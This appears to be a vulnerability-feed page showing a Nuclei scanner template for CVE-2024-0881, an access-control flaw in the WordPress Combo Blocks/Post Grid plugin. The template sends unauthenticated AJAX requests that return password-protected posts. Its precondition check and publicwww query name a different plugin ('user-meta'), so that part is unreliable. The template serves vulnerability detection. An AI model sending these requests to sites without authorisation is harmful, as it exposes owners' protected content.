Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2024-0881
HistoryMay 01, 2024 - 2:27 p.m.

Combo Blocks < 2.2.76 - Improper Access Control

2024-05-0114:27:37
ProjectDiscovery
github.com
7
cve2024
wordpress
wp-plugin
combo-blocks
unauthorized-access
ajax-vulnerability
post-carousel
form-maker
woocommerce_blocks

AI Score

7.1

Confidence

Low

EPSS

0.001

Percentile

21.4%

The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts
id: CVE-2024-0881

info:
  name: Combo Blocks < 2.2.76 - Improper Access Control
  author: Kazgangap
  severity: medium
  description: |
    The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts
  reference:
    - https://wpscan.com/vulnerability/e460e926-6e9b-4e9f-b908-ba5c9c7fb290/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0881
  classification:
    cve-id: CVE-2024-0881
    cwe-id: CWE-284
    epss-score: 0.00043
    epss-percentile: 0.08268
  metadata:
    verified: true
    max-request: 3
    publicwww-query: "/wp-content/plugins/user-meta/"
  tags: cve,cve2024,wp,wpscan,wordpress,wp-plugin,combo-blocks,exposure

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/user-meta/readme.txt'

    matchers:
      - type: word
        internal: true
        words:
          - 'User Profile Builder'

  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free"
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{"html"'
          - '"<div class='
          - '"pagination":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100deb3c2cb011969081041e458abc53a53013e5cb05bbe14f59c1faa72c014be17022100ba25e790d6e9b2dc420759b41b40d92f93167855db55d6862f69a8bfae5c740d:922c64590222798bb761d5b6d8e72950

AI Score

7.1

Confidence

Low

EPSS

0.001

Percentile

21.4%

Related for NUCLEI:CVE-2024-0881